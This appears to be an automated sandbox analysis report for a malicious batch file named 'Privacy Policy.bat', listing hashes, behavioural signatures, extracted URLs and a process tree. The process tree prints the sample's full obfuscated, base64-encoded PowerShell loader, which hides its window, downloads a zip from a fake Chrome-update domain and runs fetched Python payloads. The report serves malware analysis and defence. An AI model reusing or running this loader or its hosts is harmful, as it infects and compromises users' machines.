Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/11/2024, 19:55
Static task
static1
Behavioral task
behavioral1
Sample
Privacy Policy.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Privacy Policy.bat
Resource
win10v2004-20241007-en
General
-
Target
Privacy Policy.bat
-
Size
6KB
-
MD5
25fa3f5f45eb6b3632353718d45b282c
-
SHA1
c691a71779737379d2276fe60151fdf9609a77e6
-
SHA256
306f51ede68339ed5d0e2dbd931e9d481a87f331a5341b0740d417fe9a311936
-
SHA512
f2d6c752fa37af2e6ca8b9c4c2ffe3f2e56a137f44af932f3b79640d53c8bf2903877c3fe944f61be983639701877bdbabd0aee80e8e87ac24373122f19e2772
-
SSDEEP
192:wOFqmyT20cb6MuFxH3o7DmTFWJalSN+g4MD:wOFqmbbyFxHaVJGSN+g4M
Malware Config
Extracted
https://raw.githubusercontent.com/poseidon1338/sp04/refs/heads/main/sbat2
https://chromeupdates.com/Env.zip
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2576 powershell.exe 6 2576 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2576 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2576 3056 cmd.exe 31 PID 3056 wrote to memory of 2576 3056 cmd.exe 31 PID 3056 wrote to memory of 2576 3056 cmd.exe 31 PID 2576 wrote to memory of 1824 2576 powershell.exe 32 PID 2576 wrote to memory of 1824 2576 powershell.exe 32 PID 2576 wrote to memory of 1824 2576 powershell.exe 32 PID 1824 wrote to memory of 1660 1824 csc.exe 33 PID 1824 wrote to memory of 1660 1824 csc.exe 33 PID 1824 wrote to memory of 1660 1824 csc.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep by"pas"s -w hid"de"n -enc JAB1AHIAbAAgAD0AIAAnAGgAd"AB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0A"GgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcABvAHMAZQBpAGQAbwBuADEAMwAzADgALwBzAHAAMAA0AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBzAGIAYQB0ADIAJwANAAoAJAB1AHIAbAAyACAAPQAgACcAJwANAAoAZgB1AG4AYwB0AGkAbwBuACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAewANAAoAIAAgACQAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAQwBvAGQAZQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAnAA0ACgAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjAEMAbwBkAGUAIAAtAG4AYQBtAGUAIABXAGkAbgAzADIAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBQAGEAcwBzAFQAaAByAHUADQAKAA0ACgAgACAAJABoAHcAbgBkACAAPQAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBQAEkARAAgACQAcABpAGQAKQAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIABpAGYAIAAoACQAaAB3AG4AZAAgAC0AbgBlACAAWwBTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8AKQAgAHsADQAKACAAIAAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwA6ADoAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKAAkAGgAdwBuAGQALAAgADAAKQANAAoAIAAgAH0AIABlAGwAcwBlACAAewANAAoADQAKACAAIAAgACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAATgBlAHcALQBHAHUAaQBkAA0ACgAgACAAIAAgACQASABvAHMAdAAuAFUASQAuAFIAYQB3AFUASQAuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAgAD0AIAAkAFUAbgBpAHEAdQBlAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQANAAoAIAAgACAAIAAkAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAAxADAAMgA0AA0ACgAgACAAIAAgACQAVABlAHIAbQBpAG4AYQBsAFAAcgBvAGMAZQBzAHMAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAAtAGUAcQAgACQAVQBuAGkAcQB1AGUAVwBpAG4AZABvAHcAVABpAHQAbABlA"CAAfQApAA0ACgAgACAAIAANAAoAIAAgA"CAAIAAkAGgAdwBuAGQAIAA9ACAAJABUAGUAcgBtAGkAbgBhAGwAUAByAG8AYwBlAHMAcwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIAAgACAAaQBmACAAKAAkAGgAdwBuAGQAIAAtAG4AZQAgAFsAUwB5AHMAdABlAG0ALgBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAIAB7AA0ACgAgACAAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjADoAOgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAoACQAaAB3AG4AZAAsACAAMAApAA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARgBhAGkAbABlAGQAIAB0AG8AIABoAGkAZABlACAAdABoAGUAIABjAG8AbgBzAG8AbABlACAAdwBpAG4AZABvAHcALgAiAA0ACgAgACAAIAAgAH0ADQAKACAAIAB9AA0ACgB9AA0ACgBIAGkAZABlAC0AQwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwANAAoAJABlAG4AdgBwACAAPQAgACIAQwA6AFwAVwBpAG4ARQB4AHAAbABvAHIAZQByAFwAIgANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZQBuAHYAcAApACkAIAB7AA0ACgAgACAAIAAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGUAbgB2AHAADQAKACAAIAAgACAAIwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAQAbAB3R5uAGcAIABkAKsebgAgABEB4wAgABEBsAHjHmMAIAB0AKEebwA6ACAAJABlAG4AdgBwACIADQAKAH0ADQAKAGUAbABzAGUAIAB7AA0ACgAgACAAIAAgACMAVwByAGkAdABlAC0ASABvAHMAdAAgACIAEAGwAd0ebgBnACAAZACrHm4AIAARAeMAIAB0ANMebgAgAHQAoR5pADoAIAAkAGUAbgB2AHAAIgANAAoAfQANAAoAJABlAG4AdgB1ACAAPQAgACIAaAB0AHQAcABzADoALwAvAGMAaAByAG8AbQBlAHUAcABkAGEAdABlAHMALgBjAG8AbQAvAEUAbgB2AC4AegBpAHAAIgANAAoAJABlAG4AdgB6ACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAFcAaQBuAEgAZQBsAHAAZQByAC4AegBpAHAAIgANAAoAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAGwAaQBlAG4AdAApAC4ARABvAFcAbgBsAG8AQQBkAEYAaQBsAGUAKAAkAGUAbgB2AHUALAAgACQAZQBuAHYAegApAA0ACgB0AHIAeQAgAHsADQAKACAAIAAgACAAIwAgAFQAox5pACAAdABoALABIAB2AGkAxx5uACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBGAGkAbABlAFMAeQBzAHQAZQBtACAAbgC/HnUAIABjAGgAsAFhACAAYwDzAA0ACgAgACAAIAAgAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARgBpAGwAZQBTAHkAcwB0AGUAbQAiAA0ACgANAAoAIAAgACAAIAAjACAAEAGwAd0ebgBnACAAZACrHm4AIAARAb8ebgAgAGYAaQBsAGUAIABaAEkAUAAgAHYA4AAgAHQAaACwASAAbQDlHmMAIAARAe0AYwBoAA0ACgAgACAAIAAgACQAegBpAHAARgBpAGwAZQBQAGEAdABoACAAPQAgACQAZQBuAHYAegANAAoAIAAgACAAIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBGAG8AbABkAGUAcgAgAD0AIAAkAGUAbgB2AHAADQAKAA0ACgAgACAAIAAgACMAIABHAGkAox5pACAAbgDpAG4AIABmAGkAbABlACAAWgBJAFAADQAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAFoAaQBwAEYAaQBsAGUAXQA6ADoARQB4AHQAcgBhAGMAdABUAG8ARABpAHIAZQBjAHQAbwByAHkAKAAkAHoAaQBwAEYAaQBsAGUAUABhAHQAaAAsACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4ARgBvAGwAZABlAHIAKQANAAoADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARwBpAKMeaQAgAG4A6QBuACAAdABoAOAAbgBoACAAYwD0AG4AZwAhACIAOwANAAoAfQAgAGMAYQB0AGMAaAAgAHsADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQwDzACAAbADXHmkAIAB4AKMeeQAgAHIAYQAgAHQAcgBvAG4AZwAgAHEAdQDhACAAdAByAOwAbgBoACAAZwBpAKMeaQAgAG4A6QBuADoAIgANAAoAfQANAAoAJABzAHQAIAA9ACAAJABlAG4AdgBwACAAKwAgACIARwBpAG0AcABvAHIAdAAuAGQAYQB0ACIADQAKACQAcwB0AGMAdAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHMAdAAgAC0AUgBhAHcAIAANAAoAJABzAHQAYwB0ADIAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABzAHQAIAAtAFIAYQB3AA0ACgANAAoAJABzAHQAYwB0ACAAPQAgACQAcwB0AGMAdAAgAC0AcgBlAHAAbABhAGMAZQAgACIAJQB1AHAAJQAiACwAIAAkAHUAcgBsACAADQAKACQAcwB0AGMAdAAyACAAPQAgACQAcwB0AGMAdAAyACAALQByAGUAcABsAGEAYwBlACAAIgAlAHUAcAAlACIALAAgACQAdQByAGwAMgANAAoAJAByAHQAYwAxACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAHYAYwByAHUAbgB0AGkAbQBlADEANAAwAC4AcAB5ACIADQAKACQAcgB0AGMAMgAgAD0AIAAkAGUAbgB2AHAAIAArACAAIgB2AGMAcgB1AG4AdABpAG0AZQAxADQAMABkAC4AcAB5ACIADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAcgB0AGMAMQAgAC0AVgBhAGwAdQBlACAAJABzAHQAYwB0AA0ACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHIAdABjADIAIAAtAFYAYQBsAHUAZQAgACQAcwB0AGMAdAAyAA0ACgAkAGUAIAA9ACAAJABlAG4AdgBwACAAKwAgACIAcAB5AHQAaABvAG4ALgBlAHgAZQAiACAA"DQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHM"AIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAGAAIgAkAHIAdABjADEAYAAiACIAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBgACIAJAByAHQAYwAyAGAAIgAiACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp"4⤵PID:1660
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5eff24776c5ea4ca313b317a0a130e3f5
SHA16155d10acff863e48c6daf94abc717a01bd23f24
SHA2568a882d47c662389785a26808ecf3290e8caca4d84bb199feb75a37a8eb94fd6d
SHA512d526e3cb364a8847c908b3725a2d8ee8eb8f6230a9dac572d1b78596dff80bdf97f2fd94635e3621f94ef341b56e2573176dfc412847eb082dbfb81c62bb4e68
-
Filesize
7KB
MD5bb0c6ea81fdbba60e594aa1bfa1164f5
SHA1c06d029700e62b15c82fe6f4588856c9abcad119
SHA2564f8d3318a69d82b50512e8e1c57f0ad721a3351590f95242665610774b7b2290
SHA512f87e7b424c9303f21f77a0399568aba6730e32ea050f3df77c691e38dda91d6a6357aa51a0ebd971196b53c097f4fbc1bb0fe889a32aef9d5e2ae08645884238
-
Filesize
1KB
MD597cd5937f41ec0eac002770b4b081b9f
SHA1a82bf85592e9c2c326e2c93076c4f0ded1d4f25c
SHA25633cee92a699239271539105e70592133ee8393d50f5b04ff9598a9bd4539f56b
SHA512a5b69c710fa8f1cf545c071b86843e92a9ddcdfb3523df0e5dc364e5ad472bbccd851e8045f37e4718fcb8f3646d09cdb14e9d73591fffaf8d711b7b28766f7a
-
Filesize
237B
MD5a6e80541a483188dbce2f3d843fcbe4d
SHA1a1f2e13a3314ab6a676751936c7b3b9a9fb9103e
SHA256d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9
SHA5126f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337
-
Filesize
309B
MD57abe853e22ad6754fb8c310d701e426f
SHA1fc936fa42b2bda340cec91cf3037d74be2fce6f2
SHA256f5f3a6b2639b874b9421aa015abcc461e2731293875cdefde27fe6f9e9feaa14
SHA5121e226ff9b3b767fca4711628e338171e43093be0a334e1e4b2f63ca9e8a1f2f62f0ffe225719acf0d3254eae39dccab95aa6a9bfdd91277523458a5a3cc4ecc1
-
Filesize
652B
MD5edc11b3922d216360ca544fb4877562e
SHA14fa1dbc2b1c8af96b2afeb67811de2474a3fd431
SHA2567b7dde2aeba3e015615f8d492c41e2a13ade1fd75c13afa478cd298ff40c802b
SHA51259431ff0c390cc731a53c46132600182e4365883ae28c7c6f9c6fed702ee95f94742a321f32307cea7c04c8cab525c9f45293666c1c9e10fd88461ae6df6563a